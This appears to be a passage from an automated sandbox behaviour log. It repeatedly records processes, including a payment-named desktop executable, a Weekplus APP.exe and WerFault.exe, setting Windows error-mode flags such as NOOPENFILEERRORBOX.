Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
